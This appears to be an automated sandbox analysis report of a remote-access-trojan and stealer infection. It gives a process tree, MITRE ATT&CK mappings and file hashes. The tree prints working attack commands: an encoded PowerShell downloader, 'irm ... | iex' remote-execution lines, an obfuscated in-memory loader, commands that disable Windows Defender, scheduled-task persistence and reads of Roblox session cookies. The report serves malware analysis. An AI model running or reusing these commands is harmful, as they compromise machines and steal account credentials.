        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e JABzAGUAdAB0AGkAbgBnAHMAIAA9ACAAJwB7ACIAVwBEACIAOgAgAGYAYQBsAHMAZQAsACAAIgBhAGQAbQBpAG4AcgB1AG4AIgA6ACAAZgBhAGwAcwBlAH0AJwAgAHwAIABDAG8AbgB2AGUAcgB0AEYAcgBvAG0ALQBKAHMAbwBuADsAJAByAGEAbgBkAG8AbQBTAHQAcgBpAG4AZwAgAD0AIAAiAG8AaQBjAHEAUgBYAEcAaABjAGUAIgA7AGkAZgAgACgAJABzAGUAdAB0AGkAbgBnAHMALgBXAEQAKQAgAHsAJABzAGUAdAB0AGkAbgBnAHMALgBhAGQAbQBpAG4AcgB1AG4AIAA9ACAAJAB0AHIAdQBlADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAHIAYQB3AC4AZwBpAHQAaAB1AGIAdQBzAGUAcgBjAG8AbgB0AGUAbgB0AC4AYwBvAG0ALwBuAGkAbgBoAHAAbgAxADMAMwA3AC8ARABpAHMAYQBiAGwAZQAtAFcAaQBuAGQAbwB3AHMALQBEAGUAZgBlAG4AZABlAHIALwBtAGEAaQBuAC8AcwBvAHUAcgBjAGUALgBiAGEAdAAnACwAIAAkAGUAbgB2ADoAVABFAE0AUAAgACsAIAAnAFwAJwAgACsAIAAkAHIAYQBuAGQAbwBtAFMAdAByAGkAbgBnACAAKwAgACcALgBiAGEAdAAnACkAOwBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABFAE0AUAAgACsAIAAnAFwAJwAgACsAIAAkAHIAYQBuAGQAbwBtAFMAdAByAGkAbgBnACAAKwAgACcALgBiAGEAdAAnACAALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABIAGkAZABkAGUAbgAgAC0AVwBhAGkAdAAgAC0AVgBlAHIAYgAgAFIAdQBuAEEAcwA7AH0AOwBpAGYAIAAoACQAcwBlAHQAdABpAG4AZwBzAC4AYQBkAG0AaQBuAHIAdQBuACkAIAB7ACQAdQByAGwAIAA9ACAAJwBoAHQAdABwAHMAOgAvAC8AZwBpAHQAaAB1AGIALgBjAG8AbQAvAGUAcQA0ADQALwBkAC8AcgBhAHcALwBtAGEAaQBuAC8AdwB6AGMAcwB0AGEAdAB1AHMALgBlAHgAZQAnADsAJABvAHUAdABwAHUAdABQAGEAdABoACAAPQAgACQAZQBuAHYAOgBUAEUATQBQACAAKwAgACcAXAAnACAAKwAgACcAdwB6AGMAcwB0AGEAdAB1AHMALgBlAHgAZQAnADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAdQByAGwALAAgACQAbwB1AHQAcAB1AHQAUABhAHQAaAApADsAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACQAbwB1AHQAcAB1AHQAUABhAHQAaAAgAC0AVgBlAHIAYgAgAFIAdQBuAEEAcwA7AH0AZQBsAHMAZQAgAHsAJAB1AHIAbAAgAD0AIAAnAGgAdAB0AHAAcwA6AC8ALwBnAGkAdABoAHUAYgAuAGMAbwBtAC8AZQBxADQANAAvAGQALwByAGEAdwAvAG0AYQBpAG4ALwB3AHoAYwBzAHQAYQB0AHUAcwAuAGUAeABlACcAOwAkAG8AdQB0AHAAdQB0AFAAYQB0AGgAIAA9ACAAJABlAG4AdgA6AFQARQBNAFAAIAArACAAJwBcACcAIAArACAAJwB3AHoAYwBzAHQAYQB0AHUAcwAuAGUAeABlACcAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJAB1AHIAbAAsACAAJABvAHUAdABwAHUAdABQAGEAdABoACkAOwBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAJABvAHUAdABwAHUAdABQAGEAdABoADsAfQA=
        9⤵
        
        PID:1164
        
        C:\Users\Admin\AppData\Local\Temp\wzcstatus.exe
        
        "C:\Users\Admin\AppData\Local\Temp\wzcstatus.exe"
        10⤵
        
        PID:5892
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "wzcdetect" /tr '"C:\Users\Admin\AppData\Roaming\wzcdetect.exe"' & exit
        7⤵
        
        PID:1036
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "wzcdetect" /tr '"C:\Users\Admin\AppData\Roaming\wzcdetect.exe"'
        8⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:4900
      - C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        6⤵
        
        PID:1692
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        7⤵
        
        PID:2152
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        7⤵
        Views/modifies file attributes
        
        PID:1848
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\sihost.exe'
        7⤵
        
        PID:5260
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5936
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6088
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        7⤵
        
        PID:6028
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        7⤵
        
        PID:5860
    - - C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:4296
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c powershell "irm rentry.co/microsoft-vir/raw | iex"
        6⤵
        
        PID:2812
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell "irm rentry.co/microsoft-vir/raw | iex"
        7⤵
        
        PID:1684
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e JABzAGUAdAB0AGkAbgBnAHMAIAA9ACAAJwB7ACIAVwBEACIAOgAgAGYAYQBsAHMAZQAsACAAIgBhAGQAbQBpAG4AcgB1AG4AIgA6ACAAZgBhAGwAcwBlAH0AJwAgAHwAIABDAG8AbgB2AGUAcgB0AEYAcgBvAG0ALQBKAHMAbwBuADsAJAByAGEAbgBkAG8AbQBTAHQAcgBpAG4AZwAgAD0AIAAiAG8AaQBjAHEAUgBYAEcAaABjAGUAIgA7AGkAZgAgACgAJABzAGUAdAB0AGkAbgBnAHMALgBXAEQAKQAgAHsAJABzAGUAdAB0AGkAbgBnAHMALgBhAGQAbQBpAG4AcgB1AG4AIAA9ACAAJAB0AHIAdQBlADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAHIAYQB3AC4AZwBpAHQAaAB1AGIAdQBzAGUAcgBjAG8AbgB0AGUAbgB0AC4AYwBvAG0ALwBuAGkAbgBoAHAAbgAxADMAMwA3AC8ARABpAHMAYQBiAGwAZQAtAFcAaQBuAGQAbwB3AHMALQBEAGUAZgBlAG4AZABlAHIALwBtAGEAaQBuAC8AcwBvAHUAcgBjAGUALgBiAGEAdAAnACwAIAAkAGUAbgB2ADoAVABFAE0AUAAgACsAIAAnAFwAJwAgACsAIAAkAHIAYQBuAGQAbwBtAFMAdAByAGkAbgBnACAAKwAgACcALgBiAGEAdAAnACkAOwBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABFAE0AUAAgACsAIAAnAFwAJwAgACsAIAAkAHIAYQBuAGQAbwBtAFMAdAByAGkAbgBnACAAKwAgACcALgBiAGEAdAAnACAALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABIAGkAZABkAGUAbgAgAC0AVwBhAGkAdAAgAC0AVgBlAHIAYgAgAFIAdQBuAEEAcwA7AH0AOwBpAGYAIAAoACQAcwBlAHQAdABpAG4AZwBzAC4AYQBkAG0AaQBuAHIAdQBuACkAIAB7ACQAdQByAGwAIAA9ACAAJwBoAHQAdABwAHMAOgAvAC8AZwBpAHQAaAB1AGIALgBjAG8AbQAvAGUAcQA0ADQALwBkAC8AcgBhAHcALwBtAGEAaQBuAC8AdwB6AGMAcwB0AGEAdAB1AHMALgBlAHgAZQAnADsAJABvAHUAdABwAHUAdABQAGEAdABoACAAPQAgACQAZQBuAHYAOgBUAEUATQBQACAAKwAgACcAXAAnACAAKwAgACcAdwB6AGMAcwB0AGEAdAB1AHMALgBlAHgAZQAnADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAdQByAGwALAAgACQAbwB1AHQAcAB1AHQAUABhAHQAaAApADsAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACQAbwB1AHQAcAB1AHQAUABhAHQAaAAgAC0AVgBlAHIAYgAgAFIAdQBuAEEAcwA7AH0AZQBsAHMAZQAgAHsAJAB1AHIAbAAgAD0AIAAnAGgAdAB0AHAAcwA6AC8ALwBnAGkAdABoAHUAYgAuAGMAbwBtAC8AZQBxADQANAAvAGQALwByAGEAdwAvAG0AYQBpAG4ALwB3AHoAYwBzAHQAYQB0AHUAcwAuAGUAeABlACcAOwAkAG8AdQB0AHAAdQB0AFAAYQB0AGgAIAA9ACAAJABlAG4AdgA6AFQARQBNAFAAIAArACAAJwBcACcAIAArACAAJwB3AHoAYwBzAHQAYQB0AHUAcwAuAGUAeABlACcAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJAB1AHIAbAAsACAAJABvAHUAdABwAHUAdABQAGEAdABoACkAOwBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAJABvAHUAdABwAHUAdABQAGEAdABoADsAfQA=
        8⤵
        
        PID:3928
        
        C:\Users\Admin\AppData\Local\Temp\wzcstatus.exe
        
        "C:\Users\Admin\AppData\Local\Temp\wzcstatus.exe"
        9⤵
        
        PID:5848
        
        C:\Users\Admin\AppData\Local\Temp\wzcnetwork.exe
        
        "C:\Users\Admin\AppData\Local\Temp\wzcnetwork.exe"
        10⤵
        
        PID:2024
        
        C:\Users\Admin\AppData\Local\Temp\wzcsvc.exe
        
        "C:\Users\Admin\AppData\Local\Temp\wzcsvc.exe"
        10⤵
        
        PID:5608
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "wzcdetect" /tr '"C:\Users\Admin\AppData\Roaming\wzcdetect.exe"' & exit
        6⤵
        
        PID:1676
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        
        PID:644
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "wzcdetect" /tr '"C:\Users\Admin\AppData\Roaming\wzcdetect.exe"'
        7⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3868
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp20D1.tmp.bat""
        6⤵
        
        PID:4176
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout 3
        7⤵
        Delays execution with timeout.exe
        
        PID:1028
        
        C:\Users\Admin\AppData\Roaming\wzcdetect.exe
        
        "C:\Users\Admin\AppData\Roaming\wzcdetect.exe"
        7⤵
        
        PID:768
    - - C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        5⤵
        Executes dropped EXE
        
        PID:4688
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cxc.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1612
  - - C:\Windows\system32\net.exe
      net file
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4852
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 file
        5⤵
        
        PID:4928
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('B+SBb9nMlcptedLlwHls5n3zB58QaIA6RJiD5dfgWIk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XAHyUi12Hi0GcaikprpE4Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $AVtQZ=New-Object System.IO.MemoryStream(,$param_var); $puhlZ=New-Object System.IO.MemoryStream; $bnJJi=New-Object System.IO.Compression.GZipStream($AVtQZ, [IO.Compression.CompressionMode]::Decompress); $bnJJi.CopyTo($puhlZ); $bnJJi.Dispose(); $AVtQZ.Dispose(); $puhlZ.Dispose(); $puhlZ.ToArray();}function execute_function($param_var,$param2_var){ $UgPla=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XTeIB=$UgPla.EntryPoint; $XTeIB.Invoke($null, $param2_var);}$GZyeB = 'C:\Users\Admin\AppData\Local\Temp\cxc.bat';$host.UI.RawUI.WindowTitle = $GZyeB;$nPQuF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($GZyeB).Split([Environment]::NewLine);foreach ($pSPiG in $nPQuF) { if ($pSPiG.StartsWith(':: ')) { $qzahh=$pSPiG.Substring(3); break; }}$payloads_var=[string[]]$qzahh.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
      4⤵
      Blocklisted process makes network request
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4068
- - C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
    "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:1492
  - - C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
      "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
      4⤵
      Executes dropped EXE
      PID:1280
  - - C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
      "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      PID:2768
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c powershell "irm rentry.co/microsoft-vir/raw | iex"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4908
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell "irm rentry.co/microsoft-vir/raw | iex"
        6⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:1200
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e JABzAGUAdAB0AGkAbgBnAHMAIAA9ACAAJwB7ACIAVwBEACIAOgAgAGYAYQBsAHMAZQAsACAAIgBhAGQAbQBpAG4AcgB1AG4AIgA6ACAAZgBhAGwAcwBlAH0AJwAgAHwAIABDAG8AbgB2AGUAcgB0AEYAcgBvAG0ALQBKAHMAbwBuADsAJAByAGEAbgBkAG8AbQBTAHQAcgBpAG4AZwAgAD0AIAAiAG8AaQBjAHEAUgBYAEcAaABjAGUAIgA7AGkAZgAgACgAJABzAGUAdAB0AGkAbgBnAHMALgBXAEQAKQAgAHsAJABzAGUAdAB0AGkAbgBnAHMALgBhAGQAbQBpAG4AcgB1AG4AIAA9ACAAJAB0AHIAdQBlADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAHIAYQB3AC4AZwBpAHQAaAB1AGIAdQBzAGUAcgBjAG8AbgB0AGUAbgB0AC4AYwBvAG0ALwBuAGkAbgBoAHAAbgAxADMAMwA3AC8ARABpAHMAYQBiAGwAZQAtAFcAaQBuAGQAbwB3AHMALQBEAGUAZgBlAG4AZABlAHIALwBtAGEAaQBuAC8AcwBvAHUAcgBjAGUALgBiAGEAdAAnACwAIAAkAGUAbgB2ADoAVABFAE0AUAAgACsAIAAnAFwAJwAgACsAIAAkAHIAYQBuAGQAbwBtAFMAdAByAGkAbgBnACAAKwAgACcALgBiAGEAdAAnACkAOwBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABFAE0AUAAgACsAIAAnAFwAJwAgACsAIAAkAHIAYQBuAGQAbwBtAFMAdAByAGkAbgBnACAAKwAgACcALgBiAGEAdAAnACAALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABIAGkAZABkAGUAbgAgAC0AVwBhAGkAdAAgAC0AVgBlAHIAYgAgAFIAdQBuAEEAcwA7AH0AOwBpAGYAIAAoACQAcwBlAHQAdABpAG4AZwBzAC4AYQBkAG0AaQBuAHIAdQBuACkAIAB7ACQAdQByAGwAIAA9ACAAJwBoAHQAdABwAHMAOgAvAC8AZwBpAHQAaAB1AGIALgBjAG8AbQAvAGUAcQA0ADQALwBkAC8AcgBhAHcALwBtAGEAaQBuAC8AdwB6AGMAcwB0AGEAdAB1AHMALgBlAHgAZQAnADsAJABvAHUAdABwAHUAdABQAGEAdABoACAAPQAgACQAZQBuAHYAOgBUAEUATQBQACAAKwAgACcAXAAnACAAKwAgACcAdwB6AGMAcwB0AGEAdAB1AHMALgBlAHgAZQAnADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAdQByAGwALAAgACQAbwB1AHQAcAB1AHQAUABhAHQAaAApADsAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACQAbwB1AHQAcAB1AHQAUABhAHQAaAAgAC0AVgBlAHIAYgAgAFIAdQBuAEEAcwA7AH0AZQBsAHMAZQAgAHsAJAB1AHIAbAAgAD0AIAAnAGgAdAB0AHAAcwA6AC8ALwBnAGkAdABoAHUAYgAuAGMAbwBtAC8AZQBxADQANAAvAGQALwByAGEAdwAvAG0AYQBpAG4ALwB3AHoAYwBzAHQAYQB0AHUAcwAuAGUAeABlACcAOwAkAG8AdQB0AHAAdQB0AFAAYQB0AGgAIAA9ACAAJABlAG4AdgA6AFQARQBNAFAAIAArACAAJwBcACcAIAArACAAJwB3AHoAYwBzAHQAYQB0AHUAcwAuAGUAeABlACcAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJAB1AHIAbAAsACAAJABvAHUAdABwAHUAdABQAGEAdABoACkAOwBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAJABvAHUAdABwAHUAdABQAGEAdABoADsAfQA=
        7⤵
        
        PID:1844
        
        C:\Users\Admin\AppData\Local\Temp\wzcstatus.exe
        
        "C:\Users\Admin\AppData\Local\Temp\wzcstatus.exe"
        8⤵
        
        PID:5176
        
        C:\Users\Admin\AppData\Local\Temp\wzcnetwork.exe
        
        "C:\Users\Admin\AppData\Local\Temp\wzcnetwork.exe"
        9⤵
        
        PID:5752
        
        C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /create /f /sc minute /mo 1 /rl highest /tn "wzcnetwork" /tr "%Current%\wzcnetwork.exe"
        10⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3596
        
        C:\Users\Admin\AppData\Local\Temp\wzcsvc.exe
        
        "C:\Users\Admin\AppData\Local\Temp\wzcsvc.exe"
        9⤵
        
        PID:5808
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "wzcdetect" /tr '"C:\Users\Admin\AppData\Roaming\wzcdetect.exe"' & exit
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:744
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "wzcdetect" /tr '"C:\Users\Admin\AppData\Roaming\wzcdetect.exe"'
        6⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:4132
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp12D7.tmp.bat""
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:3384
      - C:\Windows\SysWOW64\timeout.exe
        
        timeout 3
        6⤵
        System Location Discovery: System Language Discovery
        Delays execution with timeout.exe
        
        PID:1900
      - C:\Users\Admin\AppData\Roaming\wzcdetect.exe
        
        "C:\Users\Admin\AppData\Roaming\wzcdetect.exe"
        6⤵
        
        PID:2744
  - - C:\Users\Admin\AppData\Local\Temp\sihost.exe
      "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
      4⤵
      Drops file in Drivers directory
      Executes dropped EXE
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:3012
    - - C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:3492
    - - C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        5⤵
        Views/modifies file attributes
        
        PID:3708
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\sihost.exe'
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4796
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4612
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:908
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4984
    - - C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2024
    - - C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        5⤵
        
        PID:1064
    - - C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        5⤵
        
        PID:1060
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:5032
    - - C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        5⤵
        Detects videocard installed
        
        PID:2020
    - - C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\sihost.exe" && pause
        5⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:4656
      - C:\Windows\system32\PING.EXE
        
        ping localhost
        6⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:4644

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k WerSvcGroup
1⤵
PID:4916

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Remote System Discovery

T1018

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\WizWormV4.exe.log

Filesize
654B

MD5
2cbbb74b7da1f720b48ed31085cbd5b8

SHA1
79caa9a3ea8abe1b9c4326c3633da64a5f724964

SHA256
e31b18f21621d9983bfdf1ea3e53884a9d58b8ffd79e0e5790da6f3a81a8b9d3

SHA512
ecf02d5240e0c1c005d3ab393aa7eff62bd498c2db5905157e2bf6d29e1b663228a9583950842629d1a4caef404c8941a0c7799b1a3bd1eb890a09fdb7efcff9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
627073ee3ca9676911bee35548eff2b8

SHA1
4c4b68c65e2cab9864b51167d710aa29ebdcff2e

SHA256
85b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c

SHA512
3c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb

Download Submit
